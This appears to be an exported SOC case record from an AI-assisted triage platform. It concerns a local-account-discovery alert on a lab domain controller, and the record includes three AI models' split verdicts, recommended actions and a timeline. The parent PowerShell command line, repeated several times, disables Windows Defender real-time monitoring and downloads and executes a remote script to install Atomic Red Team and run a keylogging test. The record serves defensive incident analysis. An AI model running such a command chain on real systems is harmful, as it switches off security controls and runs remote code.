Case #492
service.windows_process_creation/proc_creation_win_susp_local_system_owner_account_discovery
Analyst Verdict Classification
SUSPICIOUS by analyst
AI Analysis
Detections (1)
Local Accounts Discovery
high
Rule: service.windows_process_creation/proc_creation_win_susp_local_system_owner_account_discovery
Hostname: df-labsdc01.dflabs.local · Sensor: e4a1c62d-4d1f-44...
Event Type: NEW_PROCESS
Confidence: 87% · Verdict: suspicious
Event Data:
COMMAND_LINE:
"C:\Windows\system32\whoami.exe"
FILE_IS_SIGNED:
1
FILE_PATH:
C:\Windows\system32\whoami.exe
HASH:
1d5491e3c468ee4b4ef6edff4bbc7d06ee83180f6f0b1576763ea2efe049493a
MEMORY_USAGE:
32768
PARENT:
{'BASE_ADDRESS': 140694944940032, 'COMMAND_LINE': "PowerShell.exe Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1056.001 -CheckPrereqs ; Invoke-AtomicTest T1056.001 -GetPrereqs ; Invoke-AtomicTest T1056.001 ", 'FILE_IS_SIGNED': 1, 'FILE_PATH': 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', 'HASH': 'de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c', 'MEMORY_USAGE': 193449984, 'PARENT_ATOM': '0c13305cb3f73d15515e789969c2a835', 'PARENT_PROCESS_ID': 2440, 'PROCESS_ID': 3164, 'THIS_ATOM': '6b593eddb775332b5050941f69c2a838', 'THREADS': 32, 'TIMESTAMP': 1774364726507, 'USER_NAME': 'NT AUTHORITY\\SYSTEM'}
PARENT_PROCESS_ID:
3164
PROCESS_ID:
9048
USER_NAME:
NT AUTHORITY\SYSTEM
IOCs:
C:\Windows\system32\whoami.exe
1d5491e3c468ee4b4ef6edff4bbc7d06ee83180f6f0b1576763ea2efe049493a
https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1
MITRE:
T1033
T1059.001
T1562.001
T1056.001
Analyst Declaration:
Raw Detection JSON
{
"author": "_ext-sigma-7a14fbc3-54d9-4b4d-8700-61eddada04f0[bulk][segment]",
"cat": "Local Accounts Discovery",
"detect": {
"event": {
"COMMAND_LINE": "\"C:\\Windows\\system32\\whoami.exe\"",
"FILE_IS_SIGNED": 1,
"FILE_PATH": "C:\\Windows\\system32\\whoami.exe",
"HASH": "1d5491e3c468ee4b4ef6edff4bbc7d06ee83180f6f0b1576763ea2efe049493a",
"MEMORY_USAGE": 32768,
"PARENT": {
"BASE_ADDRESS": 140694944940032,
"COMMAND_LINE": "PowerShell.exe Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1056.001 -CheckPrereqs ; Invoke-AtomicTest T1056.001 -GetPrereqs ; Invoke-AtomicTest T1056.001 ",
"FILE_IS_SIGNED": 1,
"FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"MEMORY_USAGE": 193449984,
"PARENT_ATOM": "0c13305cb3f73d15515e789969c2a835",
"PARENT_PROCESS_ID": 2440,
"PROCESS_ID": 3164,
"THIS_ATOM": "6b593eddb775332b5050941f69c2a838",
"THREADS": 32,
"TIMESTAMP": 1774364726507,
"USER_NAME": "NT AUTHORITY\\SYSTEM"
},
"PARENT_PROCESS_ID": 3164,
"PROCESS_ID": 9048,
"USER_NAME": "NT AUTHORITY\\SYSTEM"
},
"routing": {
"arch": 2,
"did": "",
"event_id": "23304a4d-bf88-4639-afa5-dcdbfbe79c4b",
"event_time": 1774364762339,
"event_type": "NEW_PROCESS",
"ext_ip": "67.60.122.240",
"hostname": "df-labsdc01.dflabs.local",
"iid": "47501359-645e-4049-906e-e6195da7afcf",
"int_ip": "192.168.45.129",
"latency": 1500,
"moduleid": 2,
"oid": "ad19afae-3759-4207-b06e-8648b225c455",
"parent": "6b593eddb775332b5050941f69c2a838",
"plat": 268435456,
"sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
"tags": [
"domain-controller",
"fusion-soc-alert",
"fusion-soc-case",
"fusion-soc-pulled",
"fusion-soc-triage"
],
"this": "21a8a6a7b8dd3620e299741b69c2a85b"
}
},
"detect_id": "b9630d02-2865-44ef-a966-031d69c2a85b",
"detect_mtd": {
"author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community",
"description": "Local accounts, System Owner/User discovery using operating systems utilities",
"falsepositives": [
"Legitimate administrator or user enumerates local users for legitimate reason"
],
"level": "low",
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md"
],
"tags": [
"attack.discovery",
"attack.t1033",
"attack.t1087.001"
]
},
"gen_time": 1774364763841,
"link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364762\u0026selected=21a8a6a7b8dd3620e299741b69c2a85b",
"namespace": "general",
"routing": {
"arch": 2,
"did": "",
"event_id": "23304a4d-bf88-4639-afa5-dcdbfbe79c4b",
"event_time": 1774364762339,
"event_type": "NEW_PROCESS",
"ext_ip": "67.60.122.240",
"hostname": "df-labsdc01.dflabs.local",
"iid": "47501359-645e-4049-906e-e6195da7afcf",
"int_ip": "192.168.45.129",
"latency": 1500,
"moduleid": 2,
"oid": "ad19afae-3759-4207-b06e-8648b225c455",
"parent": "6b593eddb775332b5050941f69c2a838",
"plat": 268435456,
"sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
"tags": [
"domain-controller",
"fusion-soc-alert",
"fusion-soc-case",
"fusion-soc-pulled",
"fusion-soc-triage"
],
"this": "21a8a6a7b8dd3620e299741b69c2a85b"
},
"rule_tags": [
"attack.t1087.001",
"ext:ext-sigma",
"attack.discovery",
"attack.t1033"
],
"source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
"source_rule": "service.windows_process_creation/proc_creation_win_susp_local_system_owner_account_discovery",
"ts": 1774364764000
}
Threat Intel JSON
{
"virustotal": {
"malicious": false,
"provider": "virustotal",
"reputation": 3,
"stats": {
"confirmed-timeout": 0,
"failure": 0,
"harmless": 0,
"malicious": 0,
"suspicious": 0,
"timeout": 0,
"type-unsupported": 4,
"undetected": 72
}
}
}
Triage JSON
{
"confidence": 0.867,
"false_positive_reason": null,
"investigation_questions": [
"Who initiated the PowerShell command and from what session/account?",
"Is the host part of a designated testing environment?",
"Were there any other suspicious network connections to \u0027raw.githubusercontent.com\u0027?"
],
"ioc_analysis": "The binary \u0027whoami.exe\u0027 is a legitimate, signed Microsoft utility; however, its execution in this context is part of a deliberate discovery technique. The parent PowerShell process is highly suspicious as it disables security controls (Windows Defender) and executes a script directly from a remote GitHub repository.",
"iocs_extracted": [
"C:\\Windows\\system32\\whoami.exe",
"1d5491e3c468ee4b4ef6edff4bbc7d06ee83180f6f0b1576763ea2efe049493a",
"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1"
],
"mitre_techniques": [
"T1033",
"T1059.001",
"T1562.001",
"T1056.001"
],
"recommended_actions": [
"Manual analyst review required \u2014 AI models (split)",
"Verify if an authorized security assessment or \u0027Atomic Red Team\u0027 test was scheduled for this host.",
"Immediate remediation: Re-enable Windows Defender Real-time Monitoring (Set-MpPreference -DisableRealtimeMonitoring $false).",
"Investigate the origin of the PowerShell script to ensure it was initiated by an authorized user."
],
"risk_score": 57,
"severity": "high",
"summary": "**Vote: SPLIT (1/3 -\u003e SUSPICIOUS)**\n\n### \u264a gemini-cli Analysis (Primary)\n**Verdict:** true_positive | **Confidence:** 0.95\nThe detection identifies the execution of \u0027whoami.exe\u0027 as the SYSTEM user, which is a clear instance of local account discovery. The activity is part of an Atomic Red Team (ART) security simulation (T1056.001), as evidenced by the parent PowerShell process downloading and invoking the ART framework while simultaneously disabling Windows Defender real-time monitoring.\n\n**IOC Analysis:** The binary \u0027whoami.exe\u0027 is a legitimate, signed Microsoft utility; however, its execution in this context is part of a deliberate discovery technique. The parent PowerShell process is highly suspicious as it disables security controls (Windows Defender) and executes a script directly from a remote GitHub repository.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** false_positive | **Confidence:** 0.95\nThe detection flagged whoami.exe execution under SYSTEM account as suspicious, but this is a common legitimate behavior for system processes and diagnostic tools. The parent process PowerShell executed with Unrestricted policy and downloaded malicious content, indicating the real threat is the PowerShell activity, not the whoami call itself.\n\n**IOC Analysis:** whoami.exe is a legitimate Windows utility located in System32 and signed by Microsoft. Its execution under SYSTEM account is expected for system diagnostics or administrative tasks. The actual IOC of concern is the PowerShell command line containing IEX (Invoke-Expression) and downloading from GitHub, which indicates potential malicious activity.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** suspicious | **Confidence:** 0.7\nThe detection event involves a process creation of whoami.exe, a legitimate Windows system tool, but it was spawned by a PowerShell process with suspicious command-line arguments that include disabling antivirus and installing unauthorized tools, indicating potential malicious intent for local account discovery.\n\n**IOC Analysis:** The FILE_PATH C:\\Windows\\system32\\whoami.exe is a known legitimate Windows binary located in the expected system directory. The HASH is signed, suggesting it is Microsoft-signed and typically legitimate. However, the command-line context shows it was invoked by a PowerShell process executing suspicious scripts, raising suspicion due to the parent process\u0027s actions.",
"verdict": "suspicious",
"voting": {
"auto_action": "manual_review",
"mode": "split",
"total_models": 3,
"vote_summary": [
"gemini-cli: true_positive (high, 95% confidence)",
"qwen3.5:4b: false_positive (low, 95% confidence)",
"deepseek-r1:8b: suspicious (high, 70% confidence)"
],
"votes": [
{
"confidence": 0.95,
"model": "gemini-cli",
"verdict": "true_positive"
},
{
"confidence": 0.95,
"model": "qwen3.5:4b",
"verdict": "false_positive"
},
{
"confidence": 0.7,
"model": "deepseek-r1:8b",
"verdict": "suspicious"
}
],
"winning_count": 1,
"winning_verdict": "suspicious"
}
}
Response Actions
| Action | Target | Status | Result |
|---|---|---|---|
| tag | e4a1c62d-4d1f-4472-bae4-43291246b4d4:fusionsoc-investigated | failed | 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated |
| recommended | Manual analyst review required — AI models (split) | executed | General Activity Sweep: 0 events found |
| recommended | Verify if an authorized security assessment or 'Atomic Red Team' test was scheduled for this host. | executed | General Activity Sweep: 0 events found |
| recommended | Immediate remediation: Re-enable Windows Defender Real-time Monitoring (Set-MpPreference -DisableRealtimeMonitoring $false). | executed | General Activity Sweep: 0 events found |
| recommended | Investigate the origin of the PowerShell script to ensure it was initiated by an authorized user. | executed | User Activity Investigation: 32 events found |
Notes (5)
FusionSOC AI
2026-03-24T15:49
FusionSOC AI
2026-03-24T15:49
FusionSOC AI
2026-03-24T15:49
FusionSOC AI
2026-03-24T15:49
FusionSOC AI
2026-03-24T15:48
Timeline
2026-03-24T16:06:11
analyst
Status changed: investigating → closed
2026-03-24T16:06:09
analyst
Analyst classified as Suspicious (SUSPICIOUS)
2026-03-24T15:49:01
FusionSOC AI
Status changed: investigating → investigating
2026-03-24T15:49:01
FusionSOC
Action recommended → executed: User Activity Investigation: 32 events found
2026-03-24T15:49:01
FusionSOC AI
Note by FusionSOC AI: ## User Activity Investigation **Action:** Investigate the origin of the PowerShell script to ensure it was initiated ...
2026-03-24T15:49:00
FusionSOC
Response action queued: recommended on Investigate the origin of the PowerShell script to ensure it was initiated by an authorized user.
2026-03-24T15:49:00
FusionSOC AI
Status changed: investigating → investigating
2026-03-24T15:49:00
FusionSOC
Action recommended → executed: General Activity Sweep: 0 events found
2026-03-24T15:49:00
FusionSOC AI
Note by FusionSOC AI: ## General Activity Sweep **Action:** Immediate remediation: Re-enable Windows Defender Real-time Monitoring (Set-MpPr...
2026-03-24T15:49:00
FusionSOC
Response action queued: recommended on Immediate remediation: Re-enable Windows Defender Real-time Monitoring (Set-MpPreference -DisableRealtimeMonitoring $false).
2026-03-24T15:49:00
FusionSOC AI
Status changed: investigating → investigating
2026-03-24T15:49:00
FusionSOC
Action recommended → executed: General Activity Sweep: 0 events found
2026-03-24T15:49:00
FusionSOC AI
Note by FusionSOC AI: ## General Activity Sweep **Action:** Verify if an authorized security assessment or 'Atomic Red Team' test was schedu...
2026-03-24T15:49:00
FusionSOC
Response action queued: recommended on Verify if an authorized security assessment or 'Atomic Red Team' test was scheduled for this host.
2026-03-24T15:49:00
FusionSOC AI
Status changed: open → investigating
2026-03-24T15:49:00
FusionSOC
Action recommended → executed: General Activity Sweep: 0 events found
2026-03-24T15:49:00
FusionSOC AI
Note by FusionSOC AI: ## General Activity Sweep **Action:** Manual analyst review required — AI models (split) **Sensor:** `e4a1c62d-4d1f-44...
2026-03-24T15:48:59
FusionSOC
Response action queued: recommended on Manual analyst review required — AI models (split)
2026-03-24T15:48:59
FusionSOC
Action tag → failed: 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated
2026-03-24T15:48:59
FusionSOC
Response action queued: tag on e4a1c62d-4d1f-4472-bae4-43291246b4d4:fusionsoc-investigated
2026-03-24T15:48:59
FusionSOC AI
Detection b9630d02-2865-44ef-a966-031d69c2a85b triaged as suspicious (high severity, confidence: 87%)
2026-03-24T15:48:59
FusionSOC AI
Case created from detection: service.windows_process_creation/proc_creation_win_susp_local_system_owner_account_discovery